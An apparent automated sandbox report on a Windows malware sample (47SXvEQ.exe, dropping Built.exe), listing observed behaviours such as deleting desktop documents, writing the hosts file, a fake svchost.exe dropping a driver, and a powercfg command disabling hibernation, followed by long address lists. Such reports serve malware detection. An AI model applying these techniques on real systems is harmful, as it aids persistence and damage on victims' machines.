Source: C:\Users\user\AppData\Local\Temp\Built.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Desktop\ONBQCLYSPU.docx	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Desktop\LTKMYBSEYZ.pdf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Desktop\NWTVCDUMOB.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Desktop\NWTVCDUMOB.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Desktop\KATAXZVCPS.xlsx	Jump to behavior

Modifies the hosts file

Source: C:\Users\user\AppData\Local\Temp\Built.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Source: conhost.exe	Process created: 42
Source: cmd.exe	Process created: 48

System Summary

PE file contains section with special chars

Source: 47SXvEQ.exe	Static PE information: section name:
Source: 47SXvEQ.exe	Static PE information: section name: .idata
Source: 47SXvEQ.exe	Static PE information: section name:

Uses powercfg.exe to modify the power settings

Source: C:\Users\user\AppData\Local\Temp\instals.exe

Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

Source: C:\ProgramData\Microsoft\svchost.exe

File created: C:\Windows\TEMP\qnibnfgnagzt.sys

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File deleted: C:\Windows\Temp\__PSScriptPolicyTest_fpekgtoi.xrk.ps1

Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 4_2_00007FF626641000	4_2_00007FF626641000
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 4_2_00007FF626648BD0	4_2_00007FF626648BD0
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 4_2_00007FF6266669D4	4_2_00007FF6266669D4
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 4_2_00007FF6266517B0	4_2_00007FF6266517B0
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 4_2_00007FF626669798	4_2_00007FF626669798
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 4_2_00007FF62665DF60	4_2_00007FF62665DF60
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 4_2_00007FF626658804	4_2_00007FF626658804
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 4_2_00007FF626651FD0	4_2_00007FF626651FD0
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 4_2_00007FF626649870	4_2_00007FF626649870
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 4_2_00007FF62666411C	4_2_00007FF62666411C
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 4_2_00007FF6266618E4	4_2_00007FF6266618E4
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 4_2_00007FF626655DA0	4_2_00007FF626655DA0
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 4_2_00007FF626653610	4_2_00007FF626653610
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 4_2_00007FF62665E5E0	4_2_00007FF62665E5E0
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 4_2_00007FF626651DC4	4_2_00007FF626651DC4
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 4_2_00007FF626659F10	4_2_00007FF626659F10
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 4_2_00007FF626665EEC	4_2_00007FF626665EEC
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 4_2_00007FF62664A34B	4_2_00007FF62664A34B
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 4_2_00007FF626651BC0	4_2_00007FF626651BC0
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 4_2_00007FF626666488	4_2_00007FF626666488
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 4_2_00007FF626660938	4_2_00007FF626660938
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 4_2_00007FF626652C80	4_2_00007FF626652C80
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 4_2_00007FF626663C80	4_2_00007FF626663C80
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 4_2_00007FF626665C70	4_2_00007FF626665C70
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 4_2_00007FF62664AD1D	4_2_00007FF62664AD1D
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 4_2_00007FF62664A4E4	4_2_00007FF62664A4E4
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 4_2_00007FF6266519B4	4_2_00007FF6266519B4
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 4_2_00007FF626658154	4_2_00007FF626658154
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 4_2_00007FF626660938	4_2_00007FF626660938
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 4_2_00007FF626653A14	4_2_00007FF626653A14
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 4_2_00007FF6266521D4	4_2_00007FF6266521D4
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 4_2_00007FF62665DACC	4_2_00007FF62665DACC
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FF626641000	5_2_00007FF626641000
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FF62664A34B	5_2_00007FF62664A34B
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FF6266669D4	5_2_00007FF6266669D4
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FF6266517B0	5_2_00007FF6266517B0
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FF626669798	5_2_00007FF626669798
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FF62665DF60	5_2_00007FF62665DF60
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FF626658804	5_2_00007FF626658804
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FF626651FD0	5_2_00007FF626651FD0
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FF626649870	5_2_00007FF626649870
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FF62666411C	5_2_00007FF62666411C
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FF6266618E4	5_2_00007FF6266618E4
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FF626655DA0	5_2_00007FF626655DA0
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FF626653610	5_2_00007FF626653610
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FF62665E5E0	5_2_00007FF62665E5E0
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FF626651DC4	5_2_00007FF626651DC4
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FF626659F10	5_2_00007FF626659F10
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FF626665EEC	5_2_00007FF626665EEC
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FF626648BD0	5_2_00007FF626648BD0
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FF626651BC0	5_2_00007FF626651BC0
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FF626666488	5_2_00007FF626666488
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FF626660938	5_2_00007FF626660938
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FF626652C80	5_2_00007FF626652C80
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FF626663C80	5_2_00007FF626663C80
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FF626665C70	5_2_00007FF626665C70
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FF62664AD1D	5_2_00007FF62664AD1D
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FF62664A4E4	5_2_00007FF62664A4E4
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FF6266519B4	5_2_00007FF6266519B4
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FF626658154	5_2_00007FF626658154
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FF626660938	5_2_00007FF626660938
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FF626653A14	5_2_00007FF626653A14
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FF6266521D4	5_2_00007FF6266521D4
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FF62665DACC	5_2_00007FF62665DACC
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF0FA1930	5_2_00007FFDF0FA1930
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF0FA12F0	5_2_00007FFDF0FA12F0
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF1413230	5_2_00007FFDF1413230
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C114F	5_2_00007FFDF10C114F
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10EB1C0	5_2_00007FFDF10EB1C0
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10DF200	5_2_00007FFDF10DF200
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10DF060	5_2_00007FFDF10DF060
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C29CD	5_2_00007FFDF10C29CD
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C6CB7	5_2_00007FFDF10C6CB7
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C3B93	5_2_00007FFDF10C3B93
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF11F7310	5_2_00007FFDF11F7310
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C5169	5_2_00007FFDF10C5169
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C5D85	5_2_00007FFDF10C5D85
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C7045	5_2_00007FFDF10C7045
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C1EA1	5_2_00007FFDF10C1EA1
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF12FF460	5_2_00007FFDF12FF460
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10EB550	5_2_00007FFDF10EB550
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C21B7	5_2_00007FFDF10C21B7
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C609B	5_2_00007FFDF10C609B
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C6F23	5_2_00007FFDF10C6F23
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF112F700	5_2_00007FFDF112F700
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C22E8	5_2_00007FFDF10C22E8
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF12639D0	5_2_00007FFDF12639D0
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF1277A10	5_2_00007FFDF1277A10
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C4165	5_2_00007FFDF10C4165
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C3FDA	5_2_00007FFDF10C3FDA
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C6A82	5_2_00007FFDF10C6A82
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C655A	5_2_00007FFDF10C655A
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C30C1	5_2_00007FFDF10C30C1
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF11F7AF0	5_2_00007FFDF11F7AF0
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10DBD60	5_2_00007FFDF10DBD60
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C2289	5_2_00007FFDF10C2289
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C2766	5_2_00007FFDF10C2766
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF11EFE30	5_2_00007FFDF11EFE30
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C32E7	5_2_00007FFDF10C32E7
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C4C37	5_2_00007FFDF10C4C37
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10DBF20	5_2_00007FFDF10DBF20
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C3486	5_2_00007FFDF10C3486
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C1B31	5_2_00007FFDF10C1B31
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF11F6130	5_2_00007FFDF11F6130
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C1A4B	5_2_00007FFDF10C1A4B
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C7077	5_2_00007FFDF10C7077
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C6FFA	5_2_00007FFDF10C6FFA
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C3693	5_2_00007FFDF10C3693
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C1CC1	5_2_00007FFDF10C1CC1
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C4E4E	5_2_00007FFDF10C4E4E
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C5A60	5_2_00007FFDF10C5A60
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C60D7	5_2_00007FFDF10C60D7
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C5E20	5_2_00007FFDF10C5E20
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF11F2670	5_2_00007FFDF11F2670
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C5D9E	5_2_00007FFDF10C5D9E
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C23F1	5_2_00007FFDF10C23F1
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C5B0F	5_2_00007FFDF10C5B0F
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C1B22	5_2_00007FFDF10C1B22
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF1262A90	5_2_00007FFDF1262A90
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C4D04	5_2_00007FFDF10C4D04
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF11A2B40	5_2_00007FFDF11A2B40
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C72C0	5_2_00007FFDF10C72C0
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C4633	5_2_00007FFDF10C4633
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF11FB020	5_2_00007FFDF11FB020
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C6EEC	5_2_00007FFDF10C6EEC
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C213F	5_2_00007FFDF10C213F
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10DEF00	5_2_00007FFDF10DEF00
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C5BF0	5_2_00007FFDF10C5BF0
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF1279210	5_2_00007FFDF1279210
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10E5200	5_2_00007FFDF10E5200
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C68C5	5_2_00007FFDF10C68C5
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C7108	5_2_00007FFDF10C7108
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C5F0B	5_2_00007FFDF10C5F0B
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C5510	5_2_00007FFDF10C5510
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C44C6	5_2_00007FFDF10C44C6
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10DD260	5_2_00007FFDF10DD260
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C53A8	5_2_00007FFDF10C53A8
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C4287	5_2_00007FFDF10C4287
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C15C8	5_2_00007FFDF10C15C8
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C54CF	5_2_00007FFDF10C54CF
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF12015C0	5_2_00007FFDF12015C0
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C54CA	5_2_00007FFDF10C54CA
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C3A8F	5_2_00007FFDF10C3A8F
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C542F	5_2_00007FFDF10C542F
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C655F	5_2_00007FFDF10C655F
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C1299	5_2_00007FFDF10C1299
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C4AC5	5_2_00007FFDF10C4AC5
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C5047	5_2_00007FFDF10C5047
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C560F	5_2_00007FFDF10C560F
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C216C	5_2_00007FFDF10C216C
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C4F3E	5_2_00007FFDF10C4F3E
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C2135	5_2_00007FFDF10C2135
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C53C1	5_2_00007FFDF10C53C1
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C6389	5_2_00007FFDF10C6389
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C59F7	5_2_00007FFDF10C59F7
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C3A85	5_2_00007FFDF10C3A85
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF12799E0	5_2_00007FFDF12799E0
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C50AB	5_2_00007FFDF10C50AB
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF1261920	5_2_00007FFDF1261920
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C7252	5_2_00007FFDF10C7252
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C3832	5_2_00007FFDF10C3832
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C35FD	5_2_00007FFDF10C35FD
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C1CFD	5_2_00007FFDF10C1CFD
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C7365	5_2_00007FFDF10C7365
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C1D83	5_2_00007FFDF10C1D83
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF11F5E30	5_2_00007FFDF11F5E30
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C266C	5_2_00007FFDF10C266C
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C72A7	5_2_00007FFDF10C72A7
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C3BA2	5_2_00007FFDF10C3BA2
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C2982	5_2_00007FFDF10C2982
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C2D0B	5_2_00007FFDF10C2D0B
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C1622	5_2_00007FFDF10C1622
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C4746	5_2_00007FFDF10C4746
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C57D1	5_2_00007FFDF10C57D1
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C378D	5_2_00007FFDF10C378D
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C4359	5_2_00007FFDF10C4359
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C1424	5_2_00007FFDF10C1424
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C2E8C	5_2_00007FFDF10C2E8C
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C4101	5_2_00007FFDF10C4101
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C5B73	5_2_00007FFDF10C5B73
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF1200120	5_2_00007FFDF1200120
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF1170440	5_2_00007FFDF1170440
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C2C75	5_2_00007FFDF10C2C75
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF12782E0	5_2_00007FFDF12782E0
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF11EC5F0	5_2_00007FFDF11EC5F0
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C177B	5_2_00007FFDF10C177B
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10DC620	5_2_00007FFDF10DC620
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10DC480	5_2_00007FFDF10DC480
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C69E2	5_2_00007FFDF10C69E2
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C25EF	5_2_00007FFDF10C25EF
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C22AC	5_2_00007FFDF10C22AC
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C6C1C	5_2_00007FFDF10C6C1C
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C4B56	5_2_00007FFDF10C4B56
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C275C	5_2_00007FFDF10C275C
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF144B370	5_2_00007FFDF144B370
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF1451230	5_2_00007FFDF1451230
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF150E1F0	5_2_00007FFDF150E1F0
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF1580520	5_2_00007FFDF1580520
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF151F7D0	5_2_00007FFDF151F7D0
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF157FA00	5_2_00007FFDF157FA00
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF15111D0	5_2_00007FFDF15111D0
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF1562230	5_2_00007FFDF1562230
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF15061FB	5_2_00007FFDF15061FB
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFE0C0A1BB0	5_2_00007FFE0C0A1BB0
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFE0C0A53A0	5_2_00007FFE0C0A53A0
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFE0C0A2FF0	5_2_00007FFE0C0A2FF0
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFE101D3E60	5_2_00007FFE101D3E60
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFE101DC7A0	5_2_00007FFE101DC7A0
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFE101D2EB0	5_2_00007FFE101D2EB0
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFE101D60C0	5_2_00007FFE101D60C0
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFE101D3BD0	5_2_00007FFE101D3BD0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 15_2_00007FFD9B983027	15_2_00007FFD9B983027

Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: String function: 00007FF626642910 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: String function: 00007FFDF10C24B9 appears 79 times
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: String function: 00007FFDF10C1EF1 appears 1323 times
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: String function: 00007FFDF10C483B appears 115 times
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: String function: 00007FFDF10C2734 appears 461 times
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: String function: 00007FFDF10C300D appears 55 times
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: String function: 00007FFDF10C6988 appears 47 times
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: String function: 00007FF626642710 appears 104 times
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: String function: 00007FFDF10C2A04 appears 112 times
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: String function: 00007FFDF14412EE appears 51 times
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: String function: 00007FFDF10C4057 appears 697 times

Source: rar.exe.4.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unicodedata.pyd.4.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: 47SXvEQ.exe

